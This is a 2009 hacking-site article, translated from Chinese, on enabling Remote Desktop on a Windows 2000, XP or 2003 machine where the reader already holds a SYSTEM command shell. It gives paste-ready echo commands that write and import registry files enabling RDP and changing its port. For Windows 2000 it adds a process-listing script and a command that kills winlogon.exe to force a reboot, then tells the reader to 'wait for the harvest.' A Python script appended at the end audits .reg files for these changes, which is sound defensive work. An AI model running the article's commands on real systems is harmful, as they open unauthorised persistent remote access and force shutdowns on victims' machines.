A simple "green" method of opening the terminal - vulnerability warning - Black Bar Security Net (黑吧安全网)

2009-03-21T00:00:00
ID MYHACK58:62200922588
Type myhack58
Reporter 佚名 (anonymous)
Modified 2009-03-21T00:00:00

Description

Today's presentation is a "green" way of opening the terminal: environmentally friendly, pollution-free~~ no file of any kind needs to be uploaded to the target. The method applies to Windows 2000, XP and 2003. The premise of this article is that you have already obtained, by some means, a CMDSHELL on the other side running with SYSTEM permissions~~ from there, Terminal Services can be opened without transferring a single file.

1. Opening the terminal on Windows 2000. First use ECHO to write a 3389.reg file, then import it into the registry. The echo code is as follows:

    echo Windows Registry Editor Version 5.00 >>3389.reg
    echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
    echo "Enabled"="0" >>3389.reg
    echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>3389.reg
    echo "ShutdownWithoutLogon"="0" >>3389.reg
    echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>3389.reg
    echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
    echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>3389.reg
    echo "TSEnabled"=dword:00000001 >>3389.reg
    echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
    echo "Start"=dword:00000002 >>3389.reg
    echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>3389.reg
    echo "Start"=dword:00000002 >>3389.reg
    echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
    echo "Hotkey"="1" >>3389.reg
    echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>3389.reg
    echo "PortNumber"=dword:00000D3D >>3389.reg
    echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>3389.reg
    echo "PortNumber"=dword:00000D3D >>3389.reg

Pasting these ECHO lines into the CMDSHELL generates the 3389.reg file; then run regedit /s 3389.reg to import it into the registry. (If you want to change the terminal port, only the two D3D values above need to be modified.) Unlike XP, opening the terminal on Windows 2000 does not take effect immediately: the machine must be restarted before the change takes effect. A simple way to achieve this is to use ntsd.exe (a command that ships with Windows 2000 and above) to terminate an important process, which forces the machine to restart!! For example, terminating lsass.exe also works, but then a restart countdown pops up (not very nice~); when winlogon.exe is terminated, the machine is forced to restart immediately. The command format is ntsd -c q -p PID. So how do you find the PID of the winlogon.exe process?~ The following script lists the PIDs of all current processes:

    wscript.echo "PID ProcessName"
    for each ps in getobject("winmgmts:\\.\root\cimv2:win32_process").instances_
    wscript.echo ps.handle&vbtab&ps.name
    next

Paste the following ECHO code into the CMDSHELL window to produce the PID-listing script 1.vbe:

    echo wscript.echo "PID ProcessName">>1.vbe
    echo for each ps in getobject("winmgmts:\\.\root\cimv2:win32_process").instances_ >>1.vbe
    echo wscript.echo ps.handle^&vbtab^&ps.name>>1.vbe
    echo next>>1.vbe

After generating 1.vbe, check that the echoed script is correct (it is only four lines, exactly as given above). Running 1.vbe produces the following output:

    C:\WINNT\system32>cscript 1.vbe
    Microsoft (R) Windows Script Host Version 5.1 for Windows
    Copyright (C) Microsoft Corporation 1996-1999. All rights reserved.

    PID ProcessName
    0 System Idle Process
    8 System
    152 smss.exe
    180 csrss.exe
    200 winlogon.exe
    228 services.exe
    240 lsass.exe
    424 svchost.exe
    472 spoolsv.exe
    512 msdtc.exe
    616 svchost.exe
    628 KAVSvc.EXE
    660 llssrv.exe
    692 nvsvc32.exe
    728 regsvc.exe
    748 MSTask.exe
    776 alter.exe
    900 svchost.exe
    916 WinMgmt.exe
    1088 Dfssvc.exe
    484 Explorer.EXE
    1444 mdm.exe
    1340 Server.exe
    1224 ibguard.exe
    1252 KAVSvcUI.EXE
    1256 ibserver.exe
    1336 internat.exe
    1204 Uspds.exe
    720 bar.exe
    1288 dllhost.exe
    1580 inetinfo.exe
    1672 cmd.exe
    1464 pppoe.exe
    1704 regedit.exe
    316 cscript.exe

From the output above, the current PID of winlogon.exe is 200. Running the command ntsd -c q -p 200 (replace 200 with the actual PID of the winlogon.exe process) makes the machine restart immediately (ntsd.exe ships with Windows and can be used to terminate a process at any privilege level). Then wait for the harvest.~~

2. Opening the terminal on Windows XP and 2003

The REG file that opens the terminal is as follows:

    Windows Registry Editor Version 5.00
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
    "fDenyTSConnections"=dword:00000000
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]
    "PortNumber"=dword:00000D3D
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
    "PortNumber"=dword:00000D3D

Written as ECHO code that produces the REG file:

    echo Windows Registry Editor Version 5.00>>3389.reg
    echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg
    echo "fDenyTSConnections"=dword:00000000 >>3389.reg
    echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg
    echo "PortNumber"=dword:00000d3d>>3389.reg
    echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg
    echo "PortNumber"=dword:00000d3d>>3389.reg
    regedit /s 3389.reg
    del 3389.reg

(Note the space before >> on the fDenyTSConnections line: cmd.exe treats a digit written directly in front of a redirection operator as a file-handle number, so "00000000>>3389.reg" would not write that line into the file as intended.) On XP and 2003 the terminal opens without a restart. If you want to change the port, just change the D3D in the two PortNumber values above to the hexadecimal form of the desired decimal port number (use the calculator to convert). On XP, neither opening the terminal nor changing its port requires a restart; it's so nice~~hehe. Finally, if you want to close the terminal again, simply change "fDenyTSConnections"=dword:00000000 to "fDenyTSConnections"=dword:00000001.
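As an added example that is not part of the original article, the following Python script audits a .reg file for exactly the changes described in both sections above: the values that switch Terminal Services on (TSEnabled, fDenyTSConnections, the TermDD and TermService Start values, EnableAdminTSRemote) and writes to the two PortNumber values, flagging a listener moved off port 3389. This is the check a defender would run over a suspicious .reg file recovered from a host. The two sample .reg texts are the article's own files, embedded here as constructed strings; the function and variable names are mine.

```python
"""Audit a Windows .reg file for Terminal Services (RDP) enabling changes.

Added example, not code from the original article. Parses the text of a
.reg file and reports values that enable the terminal or rewrite its port.
"""
import re

DEFAULT_RDP_PORT = 3389

# (key path, value name) -> the setting that enables Terminal Services.
# Key paths are the ones named in the article; comparison is case-insensitive.
ENABLING_VALUES = {
    (r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server", "fDenyTSConnections"): 0,
    (r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server", "TSEnabled"): 1,
    (r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService", "Start"): 2,
    (r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD", "Start"): 2,
    (r"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer", "EnableAdminTSRemote"): 1,
}

# Keys whose PortNumber value sets the RDP listener port.
PORT_KEYS = {
    r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp".lower(),
    r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp".lower(),
}

# "name"=dword:xxxxxxxx  or  "name"="string"
_VALUE_RE = re.compile(r'^"([^"]+)"=(?:dword:([0-9a-fA-F]{1,8})|"(.*)")\s*$')


def parse_reg(text):
    """Return {key_path: {value_name: value}}; dword -> int, string -> str.

    Trailing whitespace is stripped so lines written with 'echo ... >>' parse too.
    """
    result = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Windows Registry Editor") or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            result.setdefault(current, {})
            continue
        m = _VALUE_RE.match(line)
        if m and current is not None:
            name, hex_value, str_value = m.groups()
            result[current][name] = int(hex_value, 16) if hex_value is not None else str_value
    return result


def audit_reg(text):
    """Return a list of finding strings for RDP-enabling changes in .reg text."""
    findings = []
    for key, values in parse_reg(text).items():
        for name, value in values.items():
            for (ek, en), enabling in ENABLING_VALUES.items():
                if key.lower() == ek.lower() and name.lower() == en.lower() and value == enabling:
                    findings.append(f"{key}\\{name}={value}: enables Terminal Services")
            if name.lower() == "portnumber" and key.lower() in PORT_KEYS and isinstance(value, int):
                note = "default port" if value == DEFAULT_RDP_PORT else "non-default port"
                findings.append(f"{key}\\PortNumber={value}: RDP listener port written ({note})")
    return findings


# Constructed sample: the article's Windows 2000 file.
SAMPLE_WIN2K = r"""Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache]
"Enabled"="0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"ShutdownWithoutLogon"="0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
"EnableAdminTSRemote"=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"TSEnabled"=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]
"Start"=dword:00000002
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
"Start"=dword:00000002
[HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle]
"Hotkey"="1"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]
"PortNumber"=dword:00000D3D
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
"PortNumber"=dword:00000D3D
"""

# Constructed sample: the article's XP/2003 file.
SAMPLE_XP = r"""Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]
"PortNumber"=dword:00000d3d
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
"PortNumber"=dword:00000d3d
"""

if __name__ == "__main__":
    for label, sample in (("win2k", SAMPLE_WIN2K), ("xp/2003", SAMPLE_XP)):
        print(f"== {label} ==")
        for finding in audit_reg(sample):
            print("  " + finding)
```

The parser ignores the harmless string values in the Windows 2000 file (netcache, ShutdownWithoutLogon, Hotkey) and reports only the values that matter for the terminal; the same audit_reg() call can be pointed at a .reg exported from a live machine to confirm whether these values are set the way the article leaves them.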